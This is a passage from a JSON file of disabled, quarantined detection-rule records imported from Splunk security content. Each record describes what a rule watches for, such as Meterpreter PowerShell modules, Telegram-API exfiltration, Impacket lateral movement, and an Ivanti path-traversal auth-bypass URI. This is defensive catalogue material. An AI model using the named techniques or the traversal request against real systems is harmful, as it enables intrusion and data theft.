If confirmed malicious, this activity could lead to unauthorized access, data breaches, or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-excessive-authentication-failures-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d441364c-349c-453b-b55f-12eccab67cf9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_excessive_authentication_failures_alert.yml" } }, { "id": "splunk-security-content-d4a3eb62-0f1e-11ec-a971-acde48001122", "type": "detection", "name": "Add DefaultUser And Password In Registry", "description": "The following analytic detects suspicious registry modifications that implement auto admin logon by adding DefaultUserName and DefaultPassword values. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" registry path. This activity is significant because it is associated with BlackMatter ransomware, which uses this technique to automatically log on to compromised hosts and continue encryption after a safe mode boot. 
If confirmed malicious, this could allow attackers to maintain persistence and further encrypt the network, leading to significant data loss and operational disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/add-defaultuser-and-password-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d4a3eb62-0f1e-11ec-a971-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/add_defaultuser_and_password_in_registry.yml" } }, { "id": "splunk-security-content-d4c4d4eb-3994-41ca-a25e-a82d64e125bb", "type": "detection", "name": "AWS ECR Container Upload Outside Business Hours", "description": "The following analytic detects the upload of a new container image to AWS Elastic Container Registry (ECR) outside of standard business hours. It leverages AWS CloudTrail logs to identify `PutImage` events occurring between 8 PM and 8 AM or on weekends. This activity is significant because container uploads outside business hours can indicate unauthorized or suspicious activity, potentially pointing to a compromised account or insider threat. 
If confirmed malicious, this could allow an attacker to deploy unauthorized or malicious containers, leading to potential data breaches or service disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-upload-outside-business-hours.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d4c4d4eb-3994-41ca-a25e-a82d64e125bb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_upload_outside_business_hours.yml" } }, { "id": "splunk-security-content-d4e40b7e-aad3-4a7d-aac8-550ea5222be5", "type": "detection", "name": "Linux Cpulimit Privilege Escalation", "description": "The following analytic detects the use of the 'cpulimit' command with specific flags ('-l', '-f') executed with 'sudo' privileges. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments and execution details. This activity is significant because if 'cpulimit' is granted sudo rights, a user can potentially execute system commands as root, leading to privilege escalation. 
If confirmed malicious, this could allow an attacker to gain root access, execute arbitrary commands, and fully compromise the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-cpulimit-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d4e40b7e-aad3-4a7d-aac8-550ea5222be5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_cpulimit_privilege_escalation.yml" } }, { "id": "splunk-security-content-d4f42098-4680-11ec-ad07-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via DCOM and PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with arguments used to start a process on a remote endpoint by abusing the DCOM protocol, specifically targeting ShellExecute and ExecuteShellCommand. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant as it indicates potential lateral movement and remote code execution attempts by adversaries. 
If confirmed malicious, this could allow attackers to execute arbitrary code remotely, escalate privileges, and move laterally within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-dcom-and-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d4f42098-4680-11ec-ad07-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_dcom_and_powershell.yml" } }, { "id": "splunk-security-content-d5039508-998d-4cfc-8b5e-9dcd679d9a62", "type": "detection", "name": "Windows ConHost with Headless Argument", "description": "The following analytic detects the unusual invocation of the Windows Console Host process (conhost.exe) with the undocumented --headless parameter. This detection leverages Endpoint Detection and Response (EDR) telemetry, specifically monitoring for command-line executions where conhost.exe is executed with the --headless argument. This activity is significant for a SOC as it is not commonly used in legitimate operations and may indicate an attacker's attempt to execute commands stealthily. 
If confirmed malicious, this behavior could lead to persistence, lateral movement, or other malicious activities, potentially resulting in data exfiltration or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003", "T1564.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-conhost-with-headless-argument.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5039508-998d-4cfc-8b5e-9dcd679d9a62", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_conhost_with_headless_argument.yml" } }, { "id": "splunk-security-content-d51c13dd-a232-4c83-a2bb-72ab36233c5d", "type": "detection", "name": "Ivanti Connect Secure System Information Access via Auth Bypass", "description": "The following analytic identifies attempts to exploit the CVE-2023-46805 and CVE-2024-21887 vulnerabilities in Ivanti Connect Secure. It detects GET requests to the /api/v1/totp/user-backup-code/../../system/system-information URI, which leverage an authentication bypass to access system information. The detection uses the Web datamodel to identify requests with a 200 OK response, indicating a successful exploit attempt. This activity is significant as it reveals potential unauthorized access to sensitive system information. 
If confirmed malicious, attackers could gain critical insights into the system, facilitating further exploitation and compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-connect-secure-system-information-access-via-auth-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d51c13dd-a232-4c83-a2bb-72ab36233c5d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_connect_secure_system_information_access_via_auth_bypass.yml" } }, { "id": "splunk-security-content-d56fe0c8-4650-11ec-a8fa-acde48001122", "type": "detection", "name": "Windows DiskCryptor Usage", "description": "The following analytic detects the execution of DiskCryptor, identified by the process names \"dcrypt.exe\" or \"dcinst.exe\". This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names. DiskCryptor is significant because adversaries use it to manually encrypt disks during an operation, potentially leading to data inaccessibility. If confirmed malicious, this activity could result in complete disk encryption, causing data loss and operational disruption. 
Immediate investigation is required to mitigate potential ransomware attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-diskcryptor-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d56fe0c8-4650-11ec-a8fa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_diskcryptor_usage.yml" } }, { "id": "splunk-security-content-d57ce957-151a-4aec-ada5-5fb1eb555b6b", "type": "detection", "name": "Windows AppLocker Execution from Uncommon Locations", "description": "The following analytic identifies the execution of applications or scripts from uncommon or suspicious file paths, potentially indicating malware or unauthorized activity. It leverages Windows AppLocker event logs and uses statistical analysis to detect anomalies. By calculating the average and standard deviation of execution counts per file path, it flags paths with execution counts significantly higher than expected. This behavior is significant as it can uncover malicious activities or policy violations. 
If confirmed malicious, this activity could allow attackers to execute unauthorized code, leading to potential system compromise or data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-applocker-execution-from-uncommon-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d57ce957-151a-4aec-ada5-5fb1eb555b6b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_applocker_execution_from_uncommon_locations.yml" } }, { "id": "splunk-security-content-d585e253-1859-4170-977d-09376c731f74", "type": "detection", "name": "Windows Short Lived DNS Record", "description": "The following analytic identifies the creation and quick deletion of a DNS object within 300 seconds in an Active Directory environment, indicative of a potential attack abusing DNS. This detection leverages Windows Security Event Codes 5136 and 5137, analyzing the duration between these events. 
This activity is significant as temporary DNS entries allow attackers to cause unexpected network traffic, leading to potential compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-short-lived-dns-record.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d585e253-1859-4170-977d-09376c731f74", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_short_lived_dns_record.yml" } }, { "id": "splunk-security-content-d5905da5-d050-48db-9259-018d8f034fcf", "type": "detection", "name": "Powershell Load Module in Meterpreter", "description": "The following analytic detects the execution of suspicious PowerShell commands associated with Meterpreter modules, such as \"MSF.Powershell\" and \"MSF.Powershell.Meterpreter\". It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as it indicates potential post-exploitation actions, including credential dumping and persistence mechanisms. 
If confirmed malicious, an attacker could gain extensive control over the compromised system, escalate privileges, and maintain long-term access, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-load-module-in-meterpreter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5905da5-d050-48db-9259-018d8f034fcf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_load_module_in_meterpreter.yml" } }, { "id": "splunk-security-content-d5a62490-6e09-11ec-884e-acde48001122", "type": "detection", "name": "Linux Doas Tool Execution", "description": "The following analytic detects the execution of the 'doas' tool on a Linux host. This tool allows standard users to perform tasks with root privileges, similar to 'sudo'. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as 'doas' can be exploited by adversaries to gain elevated privileges on a compromised host. 
If confirmed malicious, this could lead to unauthorized administrative access, potentially compromising the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-doas-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5a62490-6e09-11ec-884e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_doas_tool_execution.yml" } }, { "id": "splunk-security-content-d5af132c-7c17-439c-9d31-13d55340f36c", "type": "detection", "name": "Scheduled Task Deleted Or Created via CMD", "description": "The following analytic detects the creation or deletion of scheduled tasks via schtasks.exe when invoked with create or delete flags, specifically focusing on those executions where the process includes additional parameters such as /tr, /sc, or /ru. The detection uses Endpoint Detection and Response (EDR) telemetry mapped to the Endpoint data model, and filters out events originating from trusted system paths like C:\\Windows\\System32 or C:\\Program Files. It further narrows results to cases where schtasks.exe is launched by potentially suspicious parent processes such as cmd.exe, wscript.exe, or cscript.exe, and excludes service accounts. This behavior may indicate adversary efforts to gain persistence or evade detection by manipulating scheduled tasks using scripts or command shells. 
If confirmed malicious, such activity could lead to unauthorized code execution or the removal of monitoring mechanisms on endpoints.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/scheduled-task-deleted-or-created-via-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5af132c-7c17-439c-9d31-13d55340f36c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/scheduled_task_deleted_or_created_via_cmd.yml" } }, { "id": "splunk-security-content-d5bf5cf2-da71-11eb-92c2-acde48001122", "type": "detection", "name": "Spoolsv Writing a DLL", "description": "The following analytic detects `spoolsv.exe` writing a `.dll` file, which is unusual behavior and may indicate exploitation of vulnerabilities like CVE-2021-34527 (PrintNightmare). This detection leverages the Endpoint datamodel, specifically monitoring process and filesystem events to identify `.dll` file creation within the `\\spool\\drivers\\x64\\` path. This activity is significant as it may signify an attacker attempting to execute malicious code via the Print Spooler service. If confirmed malicious, this could lead to unauthorized code execution and potential system compromise. 
Immediate endpoint isolation and further investigation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-writing-a-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5bf5cf2-da71-11eb-92c2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_writing_a_dll.yml" } }, { "id": "splunk-security-content-d5d865e4-03e6-43da-98f4-28a4f42d4df7", "type": "detection", "name": "VMWare Aria Operations Exploit Attempt", "description": "The following analytic detects potential exploitation attempts against VMWare vRealize Network Insight, specifically targeting the CVE-2023-20887 vulnerability.\nIt monitors web traffic for HTTP POST requests directed at the vulnerable endpoint \"/saas./resttosaasservlet.\" This detection leverages web traffic data, focusing on specific URL patterns and HTTP methods.\nIdentifying this behavior is crucial for a SOC as it indicates an active exploit attempt.\nIf confirmed malicious, the attacker could execute arbitrary code, leading to unauthorized access, data theft, or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1210", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/vmware-aria-operations-exploit-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5d865e4-03e6-43da-98f4-28a4f42d4df7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/vmware_aria_operations_exploit_attempt.yml" } }, { "id": "splunk-security-content-d5f54b38-10bf-4b3a-b6fc-85949862ed50", "type": "detection", "name": "Windows Time Based Evasion via Choice Exec", "description": "The following analytic detects the use of choice.exe in batch files as a delay tactic, a technique observed in SnakeKeylogger malware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential time-based evasion techniques used by malware to avoid detection. 
If confirmed malicious, this behavior could allow attackers to execute code stealthily, delete malicious files, and persist on compromised hosts, making it crucial for SOC analysts to investigate promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-time-based-evasion-via-choice-exec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5f54b38-10bf-4b3a-b6fc-85949862ed50", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_time_based_evasion_via_choice_exec.yml" } }, { "id": "splunk-security-content-d61292d5-46e4-49ea-b23b-8049ea70b525", "type": "detection", "name": "MOVEit Certificate Store Access Failure", "description": "This detection identifies potential exploitation attempts of the CVE-2024-5806 vulnerability in Progress MOVEit Transfer. It looks for log entries indicating failures to access the certificate store, which can occur when an attacker attempts to exploit the authentication bypass vulnerability. This behavior is a key indicator of attempts to impersonate valid users without proper credentials. 
While certificate store access failures can occur during normal operations, an unusual increase in such events, especially from unexpected sources, may indicate malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/moveit-certificate-store-access-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d61292d5-46e4-49ea-b23b-8049ea70b525", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/moveit_certificate_store_access_failure.yml" } }, { "id": "splunk-security-content-d62852db-a1f1-40db-a7fc-c3d56fa8bda3", "type": "detection", "name": "Azure AD AzureHound UserAgent Detected", "description": "This detection identifies the presence of the default AzureHound user-agent string within Microsoft Graph Activity logs and NonInteractive SignIn Logs. AzureHound is a tool used for gathering information about Azure Active Directory environments, often employed by security professionals for legitimate auditing purposes. However, it can also be leveraged by malicious actors to perform reconnaissance activities, mapping out the Azure AD infrastructure to identify potential vulnerabilities and targets for further exploitation. 
Detecting its usage can help in identifying unauthorized access attempts and preemptively mitigating potential security threats to your Azure environment. Note that the user-agent string is client-controlled and trivially changed, so this is a low-cost indicator rather than a reliable control: its absence does not rule out AzureHound use, and a match should be corroborated with the volume and breadth of Graph enumeration performed by the same principal before acting on it.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004", "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-azurehound-useragent-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d62852db-a1f1-40db-a7fc-c3d56fa8bda3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_azurehound_useragent_detected.yml" } }, { "id": "splunk-security-content-d6821c0b-fcdc-4c95-a77f-e10752fae41a", "type": "detection", "name": "Adobe ColdFusion Access Control Bypass", "description": "The following analytic detects potential exploitation attempts against Adobe ColdFusion vulnerabilities CVE-2023-29298 and CVE-2023-26360.\nIt monitors requests to specific ColdFusion Administrator endpoints, especially those with an unexpected additional forward slash, using the Web datamodel.\nThis activity is significant for a SOC as it indicates attempts to bypass access controls, which can lead to unauthorized access to ColdFusion administration endpoints.\nIf confirmed malicious, this could result in data theft, brute force attacks, or further exploitation of other vulnerabilities, posing a serious security risk to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, 
"playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/adobe-coldfusion-access-control-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d6821c0b-fcdc-4c95-a77f-e10752fae41a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/adobe_coldfusion_access_control_bypass.yml" } }, { "id": "splunk-security-content-d68d8732-6f7e-4ee5-a6eb-737f2b990b91", "type": "detection", "name": "Azure AD Device Code Authentication", "description": "The following analytic identifies Azure Device Code Phishing attacks, which can lead to Azure Account Take-Over (ATO). It leverages Azure AD SignInLogs to detect suspicious authentication requests using the device code authentication protocol. This activity is significant as it indicates potential bypassing of Multi-Factor Authentication (MFA) and Conditional Access Policies (CAPs) through phishing emails. 
If confirmed malicious, attackers could gain unauthorized access to Azure AD, Exchange mailboxes, and Outlook Web Application (OWA), leading to potential data breaches and unauthorized data access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-device-code-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d68d8732-6f7e-4ee5-a6eb-737f2b990b91", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_device_code_authentication.yml" } }, { "id": "splunk-security-content-d696f622-6b08-4336-b456-696cb5b43ba0", "type": "detection", "name": "Windows Event Logging Service Has Shutdown", "description": "The following analytic detects the shutdown of the Windows Event Log service by leveraging Windows Event ID 1100. This event is logged every time the service stops, including during normal system shutdowns. Monitoring this activity is crucial as it can indicate attempts to cover tracks or disable logging. If confirmed malicious, an attacker could hide their activities, making it difficult to trace their actions and investigate further incidents. 
Analysts should verify if the shutdown was planned and review other alerts and data sources for additional suspicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-event-logging-service-has-shutdown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d696f622-6b08-4336-b456-696cb5b43ba0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_event_logging_service_has_shutdown.yml" } }, { "id": "splunk-security-content-d6b0d627-d0bf-46b1-936f-c48284767d21", "type": "detection", "name": "Potential Telegram API Request Via CommandLine", "description": "The following analytic detects the presence of \"api.telegram.org\" in the CommandLine of a process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity can be significant as the telegram API has been used as an exfiltration mechanism or even as a C2 channel. 
If confirmed malicious, this could allow an attacker or malware to exfiltrate data or receive additional C2 instruction, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102.002", "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/potential-telegram-api-request-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d6b0d627-d0bf-46b1-936f-c48284767d21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/potential_telegram_api_request_via_commandline.yml" } }, { "id": "splunk-security-content-d6e464e4-5c6a-474e-82d2-aed616a3a492", "type": "detection", "name": "Impacket Lateral Movement WMIExec Commandline Parameters", "description": "The following analytic detects the use of Impacket's `wmiexec.py` tool for lateral movement by identifying specific command-line parameters. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes spawned by `wmiprvse.exe` with command-line patterns indicative of Impacket usage. This activity is significant as Impacket tools are commonly used by adversaries for remote code execution and lateral movement within a network. 
If confirmed malicious, this could allow attackers to execute arbitrary commands on remote systems, potentially leading to further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003", "T1047", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/impacket-lateral-movement-wmiexec-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d6e464e4-5c6a-474e-82d2-aed616a3a492", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml" } }, { "id": "splunk-security-content-d6f2b006-0041-11ec-8885-acde48001122", "type": "detection", "name": "PowerShell 4104 Hunting", "description": "The following analytic identifies suspicious PowerShell execution using Script Block Logging (EventCode 4104). It leverages specific patterns and keywords within the ScriptBlockText field to detect potentially malicious activities. This detection is significant for SOC analysts as PowerShell is commonly used by attackers for various malicious purposes, including code execution, privilege escalation, and persistence. 
